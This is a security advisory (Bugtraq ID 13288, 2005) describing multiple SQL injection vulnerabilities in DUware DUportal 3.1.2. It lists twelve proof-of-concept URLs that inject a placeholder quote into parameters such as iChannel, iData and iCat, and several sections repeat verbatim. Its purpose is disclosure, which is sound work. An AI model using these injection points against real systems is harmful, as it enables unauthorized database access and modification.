DUportal/DUportal SQL Multiple SQL Injection Vulnerabilities
BID:13288
Info
DUportal/DUportal SQL Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 13288 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 20 2005 12:00AM |
| Updated: | Apr 20 2005 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to dcrab <[email protected]>. |
| Vulnerable: |
DUware DUportal 3.1.2 SQL DUware DUportal 3.1.2 |
| Not Vulnerable: | |
Discussion
DUportal/DUportal SQL Multiple SQL Injection Vulnerabilities
DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities are reported to affect DUportal/DUportal SQL 3.1.2; earlier versions may also be affected.
DUportal/DUportal SQL are prone to multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities are reported to affect DUportal/DUportal SQL 3.1.2; earlier versions may also be affected.
Exploit / POC
DUportal/DUportal SQL Multiple SQL Injection Vulnerabilities
No exploit is required.
The following proof of concepts are available:
http://www.example.com/test_DUportal/home/../home/channel.asp?iChannel='SQL_INJECTION&nChannel=Articles
http://www.example.com/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=221&iChannel=7&nChannel=Ads
http://www.example.com/test_DUportal/home/detail.asp?iData=136&iCat='SQL_INJECTION&iChannel=7&nChannel=Ads
http://www.example.com/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112
http://www.example.com/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData='SQL_INJECTION&nChannel=Products&iRate=5
http://www.example.com/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData=86&nChannel=Products&iRate='SQL_INJECTION
http://www.example.com/test_DUportal/home/detail.asp?iData=86&iCat='SQL_INJECTION&iChannel=8&nChannel=Products
http://www.example.com/test_DUportal/home/channel.asp?iChannel='SQL_INJECTION
http://www.example.com/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=248&iChannel=6&nChannel=Events
http://www.example.com/test_DUportal/home/detail.asp?iData=10&iCat='SQL_INJECTION&iChannel=1&nChannel=News
http://www.example.com/test_DUportal/home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
http://www.example.com/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products
No exploit is required.
The following proof of concepts are available:
http://www.example.com/test_DUportal/home/../home/channel.asp?iChannel='SQL_INJECTION&nChannel=Articles
http://www.example.com/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=221&iChannel=7&nChannel=Ads
http://www.example.com/test_DUportal/home/detail.asp?iData=136&iCat='SQL_INJECTION&iChannel=7&nChannel=Ads
http://www.example.com/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112
http://www.example.com/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData='SQL_INJECTION&nChannel=Products&iRate=5
http://www.example.com/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData=86&nChannel=Products&iRate='SQL_INJECTION
http://www.example.com/test_DUportal/home/detail.asp?iData=86&iCat='SQL_INJECTION&iChannel=8&nChannel=Products
http://www.example.com/test_DUportal/home/channel.asp?iChannel='SQL_INJECTION
http://www.example.com/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=248&iChannel=6&nChannel=Events
http://www.example.com/test_DUportal/home/detail.asp?iData=10&iCat='SQL_INJECTION&iChannel=1&nChannel=News
http://www.example.com/test_DUportal/home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
http://www.example.com/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products
Solution / Fix
DUportal/DUportal SQL Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.